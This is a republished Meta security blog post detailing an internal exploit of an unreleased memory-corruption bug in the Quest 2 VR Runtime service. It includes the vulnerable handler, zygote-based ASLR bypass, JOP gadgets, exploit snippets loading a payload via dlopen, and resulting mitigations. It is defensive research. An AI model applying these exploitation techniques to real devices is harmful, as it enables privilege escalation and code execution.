Meta Quest 2: Defense through offense

By mullaned2002

September 12, 2023

309

Meta’s Native Assurance team regularly performs manual code reviews as part of our ongoing commitment to improve the security posture of Meta’s products.
In 2021, we discovered a vulnerability in the Meta Quest 2’s Android-based OS that never made it to production but helped us find new ways to improve the security of Meta Quest products.
We’re sharing our journey to get arbitrary native code execution in the privileged VR Runtime service on the Meta Quest 2 by exploiting a memory corruption vulnerability from an unprivileged application over Runtime IPC.

In 2021, the Native Assurance team at Meta (part of the Product Security organization) performed a code review on a privileged service called VR Runtime which provides VR services to client applications on VROS, the Android Open Source Project (AOSP)-based OS for the Meta Quest product line. In the process they found multiple memory corruption vulnerabilities that could be triggered by any installed application.

This vulnerability never made it into production. But to get a better understanding of how exploitation could happen on VROS we decided to use this opportunity to write an elevation-of-privilege exploit that could execute arbitrary native code in VR Runtime. Doing so gave us an even better understanding of what exploitation could look like on VROS and gave us actionable items we’re using to improve the security posture of Meta Quest products.

An introduction to VROS

VROS is an in-house AOSP build that runs on the Meta Quest product line up. It contains customizations on top of AOSP to provide the VR experience on Quest hardware, including firmware, kernel modifications, device drivers, system services, SELinux policies, and applications.

As an Android variant, VROS has many of the same security features as other modern Android systems. For example, it uses SELinux policies to reduce the attack surfaces exposed to unprivileged code running on the device. Because of these protections, modern Android exploits typically require chains of exploits against numerous vulnerabilities to gain control over a device. Attackers attempting to compromise VROS must overcome similar challenges.

Image source: https://source.android.com/docs/core/architecture

On VROS, VR applications are essentially regular Android applications. However, these applications communicate with a variety of system services and hardware to provide the VR experience to users.

VR Runtime

VR Runtime is a service that provides VR features such as time warp and composition to client VR applications. The service is contained within the com.oculus.vrruntimeservice process as part of the com.oculus.systemdriver (VrDriver.apk) package. The VrDriver package is installed to /system/priv-app/ in VROS making com.oculus.vrruntimeservice a privileged service with SELinux domain priv_app. This gives it permissions beyond what are given to normal Android applications.

The VR Runtime service is built on a custom IPC called Runtime IPC that is developed by Meta. Runtime IPC uses UNIX pipes and ashmem shared memory regions to facilitate communication between clients and servers. A native broker process called runtimeipcbroker sits in the middle between clients and servers and manages the initial connection, after which clients and servers communicate directly with one another.

VR application / VR Runtime connections

All VR applications use Runtime IPC to connect to the VR Runtime server running in the com.oculus.vrruntimeservice process using either the VrApi or OpenXR API. The VrApi and OpenXR interfaces load a library dynamically from VrDriver.apk containing the client side of the VR Runtime implementation and use this under the hood to perform various VR operations supported by VR Runtime such as time warp.

This process can be summarized in a sequence of steps:

A loader is linked to all VR applications at build time. This makes it so VR apps can run on multiple products/versions.
When a VR app starts, the loader uses dlopen to load the vrapiimpl.so library installed as part of VrDriver.apk. The loader will obtain the addresses of functions within vrapiimpl.so associated with the public VrApi or OpenXR interface.
After the loader’s execution:

The VR application will create a Runtime IPC connection to the VR Runtime server running inside of com.oculus.vrruntimeservice.
This process is mediated by the native runtimeipcbroker process, which performs permissions checks and other hand-off responsibilities so that the client and server can communicate directly.
From this point forward the connection uses UNIX pipes and shared memory regions for client/server communication.

The VR Runtime attack surface

The default SELinux domain for most applications on VROS is untrusted_app. These applications include those that are installed from the Meta Quest Store as well as those that are sideloaded onto the device. The untrusted_app domain is restrictive and meant to contain the minimum SELinux permissions that an application should need.

Since untrusted applications can communicate with the more privileged VR Runtime server this introduces an elevation of privilege risk. If an untrusted application is able to exploit a vulnerability in the VR Runtime code it will be able to perform operations on the device reserved for privileged applications. Because of this, all inputs from untrusted applications to VR Runtime should be scrutinized heavily.

The most important inputs that VR Runtime processes from untrusted applications are those that originate from RPC requests and from read/write shared memory. The code that processes these inputs consists of the attack surface of VR Runtime, as shown below:

Exploiting VR Runtime

Before diving into the vulnerability and its exploitation, let us explain the exploitation scenario that we considered.

Anyone who owns a Meta Quest headset is able to turn on developer mode, which allows users to sideload applications and have adb / shell access. This doesn’t mean users are able to get root on their devices, but it does give them a large amount of flexibility for interacting with the headset that they would not have otherwise.

We chose to pursue exploitation from the perspective of an application that escalates its privileges on the headset. Such an application could be intentionally malicious or be sideloaded by a user for jailbreaking purposes.

The vulnerability

The vulnerability that we chose for exploitation never made it into a production release, but it was introduced in a code commit in 2021. The commit added processing code for a new type of message that the VR Runtime could receive over Runtime IPC. Here is a redacted code snippet of what the vulnerability looked like:

REGISTER_RPC_HANDLER(
SetPerformanceIdealFeatureState,
[=](const uint32_t clientId,
const SetPerformanceIdealFeatureStateRequest request,
bool& response) {
// …

PerformanceManagerState->IdealFeaturesState.features_[static_cast<uint32_t>(request.Feature)]
.status_ = request.Status;
PerformanceManagerState->IdealFeaturesState.features_[static_cast<uint32_t>(request.Feature)]
.fidelity_ = request.Fidelity;
// …
response = true;
return reflect::RPCResult_Complete;
})

The request parameter is an object that is built based on what is received over Runtime IPC. This means both request.Feature and request.Status are attacker controlled. The PerformanceManagerState->IdealFeaturesState.features_ variable is a statically-sized array and lives in the .bss section of the libvrruntimeservice.so module. PerformanceManagerState->IdealFeaturesState.features_ is structured as follows:

enum class FeatureFidelity : uint32_t { … };
enum class FeatureStatus : uint32_t { … };
struct FeatureState {
FeatureFidelity fidelity_;
FeatureStatus status_;
};

struct FeaturesState {
std::array<FeatureState, 31> features_;
};

Since request.Feature and request.Status are attacker controlled and PerformanceManagerState->IdealFeaturesState.features_ is a statically-sized array, the vulnerability gives an attacker the ability to perform arbitrary 8-byte-long corruptions at arbitrary offsets (32-bit limit). Any VR application can trigger this vulnerability by sending a specially crafted SetPerformanceIdealFeatureState Runtime IPC message. Moreover, the vulnerability is stable and can be repeated.

Hijacking control-flow

The end goal for our exploit was arbitrary native code execution. We needed to turn this 8-byte write vulnerability into something useful for an attacker. The first step was to find a corruption target to take control of the program counter.

Thankfully for us, VR Runtime is a complex stateful piece of software and there are a lot of interesting potential targets inside its .bss section. The ideal corruption target for us was a function pointer that:

Is stored at an arbitrary offset right after the global array. This is important because it means we can use the 8-byte write primitive to corrupt and control its value.
Has an attacker-reachable call site that invokes it. This is important because without a call site invoking the function pointer, we can’t take over the control flow.

To enumerate the corruption targets that were reachable from the write primitive, we used Ghidra to manually analyze the layout of the .bss section of the libvrruntimeservice.so binary. First, we located where the array is stored in the section. This location corresponds to the beginning of the PerformanceManagerState->IdeaFeatureState.features_ array that you can see below.

We then searched for forward reachable corruption targets that were contained within the libvrruntimservice.so binary. Lucky for us, we found an array of function pointers that are dynamically resolved at runtime and stored within a global instance of an ovrVulkanLoader object. The function pointers contained within ovrVulkanLoader point into the libvulkan.so module providing the Vulkan interface. The Vulkan interface function pointer calls are invokable indirectly from attacker-controlled inputs over RPC. These two properties satisfy the two exploitation criteria we mentioned earlier.

With that in mind, we looked for a function pointer that we knew could be invoked indirectly from an RPC command. We chose to overwrite the vkGetPhysicalDeviceImageFormatProperties function pointer, which can be called from a control flow originating from the CreateSwapChain Runtime IPC RPC command.

Below is a decompilation output of the CreateTextureSwapChainVulkan function that invokes the vkGetPhysicalDeviceImageFormatProperties function pointer:

To hijack control flow, we first used the write primitive to corrupt the vkGetPhysicalDeviceImageFormatProperties function pointer and then crafted an RPC command that triggered the CreateTextureSwapChainVulkan function. This eventually allowed us to control the program counter:

Bypassing Address Space Layout Randomization (ASLR)

We turned this corruption primitive into something that allowed us to control the program counter of the target. Address Space Layout Randomization (ASLR) is an exploit mitigation that makes it difficult for exploits to predict the address space of the target. Because of ASLR, we had no knowledge of the target address space: We didn’t know where libraries were loaded and didn’t know where the heap or stack was. Knowing these locations is extremely useful for an attacker because they can redirect the execution flow to loaded libraries and reuse some of their code. This is a technique known as jump-oriented programming (JOP) or return-oriented programming (a specific case of JOP).

Bypassing ASLR is a common problem in modern exploitation and the answer is usually to:

Find or manufacture a way to leak hints about the address-space (function addresses, saved-return addresses, heap pointers, etc.).
Find another way.

We explored both of those options and eventually stumbled upon something rather interesting:

$ adb shell ps -A
USER PID PPID VSZ RSS WCHAN ADDR S NAME
root 694 1 5367252 128760 poll_schedule_timeout 0 S zygote64
u0_a5 1898 694 5801656 112280 ptrace_stop 0 t com.oculus.vrruntimeservice
u0_a80 7519 694 5383760 104720 do_epoll_wait 0 S com.oculus.vrexploit

In the above, you can see that our application and our target have been forked off the zygote64 process. The result is that our process inherits the same address space from the zygote64 process as the VR Runtime process. This means that the loaded libraries in the zygote64 process at fork time will be loaded at the same addresses in both of those processes.

This is extremely useful because it means that we don’t need to break ASLR anymore since we have detailed knowledge of where numerous libraries reside in memory. Below shows an example where the libc.so module is loaded at 0x7dae043000 in both processes:

$ adb shell cat /proc/1898/maps | grep libc.so
7dae043000-7dae084000 r–p 00000000 fd:00 286 /apex/com.android.runtime/lib64/bionic/libc.so
7dae084000-7dae11e000 –xp 00040000 fd:00 286 /apex/com.android.runtime/lib64/bionic/libc.so
7dae11e000-7dae126000 r–p 000d9000 fd:00 286 /apex/com.android.runtime/lib64/bionic/libc.so
7dae126000-7dae129000 rw-p 000e0000 fd:00 286 /apex/com.android.runtime/lib64/bionic/libc.so

$ adb shell cat /proc/7519/maps | grep libc.so
7dae043000-7dae084000 r–p 00000000 fd:00 286 /apex/com.android.runtime/lib64/bionic/libc.so
7dae084000-7dae11e000 –xp 00040000 fd:00 286 /apex/com.android.runtime/lib64/bionic/libc.so
7dae11e000-7dae126000 r–p 000d9000 fd:00 286 /apex/com.android.runtime/lib64/bionic/libc.so
7dae126000-7dae129000 rw-p 000e0000 fd:00 286 /apex/com.android.runtime/lib64/bionic/libc.so

Using this knowledge, we enumerated all shared libraries in both address spaces and looked for code reuse gadgets in them. At this point there were literally millions of code reuse gadgets in a file that we needed to sift through to assemble a JOP chain and accomplish our goal.

…
0x240b4: ldr x8, [x0]; ldr x8, [x8, #0x40]; blr x8;
0x23ad0: ldr x8, [x0]; ldr x8, [x8, #0x48]; blr x8;
0x23ab0: ldr x8, [x0]; ldr x8, [x8, #0x50]; blr x8;
0x24040: ldr x8, [x0]; ldr x8, [x8, #0x70]; blr x8;
0x23100: ldr x8, [x0]; ldr x8, [x8, #8]; blr x8;
0x23ae0: ldr x8, [x0]; ldr x8, [x8]; blr x8;
0x22ba8: ldr x8, [x0]; ldr x9, [x8, #0x30]; add x8, sp, #8; blr x9;
0x231e0: ldr x8, [x0]; mov x19, x0; ldr x8, [x8, #0x58]; blr x8;
0x208fc: ldr x8, [x0]; rev x0, x8; ret;
0x231f0: ldr x8, [x19]; mov w20, w0; mov x0, x19; ldr x8, [x8, #0x60]; blr x8;
0x22de4: ldr x8, [x1]; mov x0, x1; ldr x8, [x8, #0x70]; blr x8;
0x179e4: ldr x8, [x20], #0x10; sub x19, x19, #1; ldr x8, [x8]; blr x8;
0x17ea4: ldr x8, [x21]; mov x0, x21; ldr x8, [x8, #0x10]; blr x8;
0x23b0c: ldr x8, [x21]; mov x0, x21; mov x1, x20; ldr x8, [x8, #0x48]; blr x8;
0x17b38: ldr x8, [x22], #0x10; mov x0, x21; ldr x8, [x8]; blr x8;
0x17ad8: ldr x8, [x22], #0xfffffffffffffff0; mov x0, x21; ldr x8, [x8]; blr x8;
0x23be0: ldr x8, [x22]; mov w23, w0; mov x0, x22; ldr x8, [x8, #0x60]; blr x8;

We now had control over the execution flow, knew where a large subset of libraries loaded in the VR Runtime are placed in memory, and had a list of code reuse gadgets. The next step was to actually write the exploit to execute a payload of our choosing in the VR Runtime process.

Exploitation

As a reminder, our exploitation scenario was from the perspective of an already installed untrusted application. Our approach for exploitation was to get the VR Runtime process to load a shared library using dlopen from our application APK. When VR Runtime loaded the library, our payload would be executed automatically as part of the loaded library’s initialization function.

Accomplishing this meant we needed a JOP chain that performed the following sequence of operations:

Assign a pointer to $x0 (the first function argument in the ARM64 ABI) pointing to a path of a shared module we placed in our exploit APK.
Redirect the program counter to dlopen.

To build our JOP chain we filtered the list of gadgets based on the registers and memory we controlled at the time of hijack. The state at the time of the hijack is illustrated below:

Recall that the $x0 register at the time of the control flow transfer to dlopen corresponds to the path argument. The problem we now had to solve was how do we load $x0 with a pointer to a string we control? This is tricky because the only place we were able to insert controlled data is the .bss section of the target. But we didn’t know its location in memory, so we couldn’t hardcode its address.

One thing that was very helpful for us is that there happened to be a pointer to the .bss section (ovrVulkanLoader) in the $x21 register at the time of control flow hijack. This meant that in theory we could simply move $x21 or a value offset from $x21 into $x0. This would give us our controlled path argument to dlopen, solving our problem.

After hours of sifting through gadgets, we eventually found one that did exactly what we needed and also allowed us to keep control flow:

ldr x2,[x21 , #0x80 ]
mov w1,#0x1000
mov x0,x21
blr x2

We could then use another gadget to set $x1 (the second function argument in the ARM64 ABI) to a sane value and invoke dlopen:

mov w1,#0x2
bl <EXTERNAL>::dlopen undefined dlopen()

Luckily, the write vulnerability we used in the exploit was also repeatable. This meant that we could overwrite multiple locations in memory offset from $x21 (ovrVulkanLoader). We ended up using multiple RPC commands to overwrite memory in the way we needed for setting up our gadget state and only afterwards triggering the control flow hijack.

Using this approach, we set up the gadget state to combine the two gadgets above and were able to load our shared module giving us arbitrary native code execution:

// Corrupt the `vulkanLoader.vkGetPhysicalDeviceImageFormatProperties` pointer which is
// at +0x68. We hijack control flow by triggering a function call in
// ovrSwapChain::CreateTextureSwapChainVulkan.
// First gadget in eglSubDriverAndroid.so
// 0010b3ac a2 42 40 f9 ldr x2,[x21 , #0x80 ]
// 0010b3b0 e1 03 14 32 mov w1,#0x1000
// 0010b3b4 e0 03 15 aa mov x0,x21
// 0010b3b8 40 00 3f d6 blr x2
const uint64_t vkGetPhysicalDeviceImageFormatPropertiesOffset = VulkanLoaderOffset + 0x68;
const uint64_t FirstGadget = ModuleMap.at(“eglSubDriverAndroid.so”) + 0xb3’ac;
Corruptions.emplace_back(vkGetPhysicalDeviceImageFormatPropertiesOffset, FirstGadget);

// Second gadget in libcutils.so:
// 0010bc78 41 00 80 52 mov w1,#0x2
// 0010bc7c ad 0d 00 94 bl <EXTERNAL>::dlopen undefined dlopen()
const uint64_t SecondGadget = ModuleMap.at(“/system/lib64/libcutils.so”) + 0xbc’78;
Corruptions.emplace_back(VulkanLoaderOffset + 0x80, SecondGadget);

And below is what it looked like from GDB (GNU Debugger):

(gdb) break *0x7c98012c78
Breakpoint 1 at 0x7c98012c78

(gdb) c
Continuing.
Thread 41 “Thread-15” hit Breakpoint 1, 0x0000007c98012c78 in ?? ()

(gdb) x/s $x0
0x7bb11633e8: “/data/app/com.oculus.vrexploit-OjL813hdSAtlc3fEkJKdrg==/lib/arm64/libinject-arm64.so”

(gdb) c
Continuing.
warning: Could not load shared library symbols for /data/app/com.oculus.vrexploit-OjL813hdSAtlc3fEkJKdrg==/lib/arm64/libinject-arm64.so.

At that point, we accomplished our goal and were able to execute arbitrary native code in the VR Runtime process.

What we learned

We tried to derive as much value out of the exercise as possible with a focus on actionable items we could use to improve the security posture of Meta products. We won’t list all the outcomes in this post but here are some of the most notable.

RELRO for function pointers in RW global memory

One of the patterns we noticed early in the exercise was that the VR Runtime service contained many function pointers in global memory. The VR Runtime process loads these function pointers early in its initialization by first calling dlopen on certain system installed libraries and then using dlsym to assign a given function pointer with its associated address.

This approach provides flexibility to developers to use vendor libraries providing a common API across products (e.g., libvulkan.so). The downside is that the function pointers are stored in readable and writable memory, making them prime targets for memory corruption-based overwrites. In VR Runtime’s case, they were stored in global readable writable memory that happened to be reachable from our out-of-bounds write exploitation primitive. Additionally, these function pointers are not protected by compiler mitigations such as control flow integrity.

As an outcome of our exploitation exercise, we explored different strategies to protect these function pointers after their initial assignment. One strategy was to try and mirror the well-known full relocation read-only (RELRO) mitigation that is used to protect pointers to functions in other libraries computed by the dynamic linker at load time. In full RELRO, the mappings containing these pointers are made read-only after they are initialized, which prevents malicious writes from overwriting their contents.

We made multiple changes to the VR Runtime code to mark function pointers in global memory to be read only after we initialized them. Had this protection been in place it would have made our exploitation much more difficult. We are now working on generalizing this approach by building an LLVM compiler pass that implements the technique.

Thoughts on SELinux

One of the most frustrating things for us during exploit development was the constraints imposed on us by SELinux. With that said, we were pleasantly surprised that we could load a .so library out of an untrusted application’s data directory as a privileged application. This is because Android’s default SELinux policy enables privileged applications (typically installed to platform_app, system_app, or priv_app) to execute code under /data/app, which is where untrusted applications are commonly installed.

Android supports this behavior because it allows for updates to privileged applications outside of OTA updates. This allows privileged applications signed with the same certificate as the original to be updated in a more lightweight manner. An updated privileged application is installed to /data/app, but retains its privileged SELinux context.

While we did not develop a solution to this issue, we feel it’s worth calling out as a potential area for improvement on Android. In general, we don’t believe that privileged applications should be able to execute code owned by lesser privileged applications.

About Meta’s Native Assurance team

The Meta Native Assurance team that performed this exploit exercise is part of a larger product security group that performs proactive security work on Meta’s products. Some examples of this work include fuzzing, static analysis, architecture/implementation reviews, attack surface reduction, exploit mitigations, and more. In addition, Meta also offers a bug bounty program to incentivize security research across its entire external attack surface, including the VR and AR products.

The post Meta Quest 2: Defense through offense appeared first on Engineering at Meta.

Meta Quest 2: Defense through offense

An introduction to VROS

VR Runtime

VR application / VR Runtime connections

The VR Runtime attack surface

Exploiting VR Runtime

The vulnerability

Hijacking control-flow

Bypassing Address Space Layout Randomization (ASLR)

Exploitation

What we learned

RELRO for function pointers in RW global memory

Thoughts on SELinux

About Meta’s Native Assurance team

Maestro: Netflix’s Workflow Orchestrator

Meet Caddy – Meta’s next-gen mixed reality CAD software

AI Lab: The secrets to keeping machine learning engineers moving fast

LEAVE A REPLY Cancel reply

Most Popular

Schneider Electric automates Salesforce account hierarchy management with generative artificial intelligence (AI) using Amazon Aurora and Amazon Bedrock

Leverage enterprise data with Denodo and Vertex AI for generative AI applications

TypeScript takes aim at truthy and nullish bugs

Make relevant movie recommendations using Amazon Neptune, Amazon Neptune Machine Learning, and Amazon OpenSearch Service

Recent Comments

EDITOR PICKS

Exploring the Click Element Variable in Google Tag Manager

How to track events with Google Tag Manager and Google Analytics

Data Layer Variable in GTM: What, Why, and Where?

POPULAR POSTS

Get to production-grade data faster by using new built-in interfaces with Amazon SageMaker Ground Truth Plus

Optimizing BigQuery for astronomy datasets using HealPix Index

Damage assessment using Amazon SageMaker geospatial capabilities and custom SageMaker models

POPULAR CATEGORY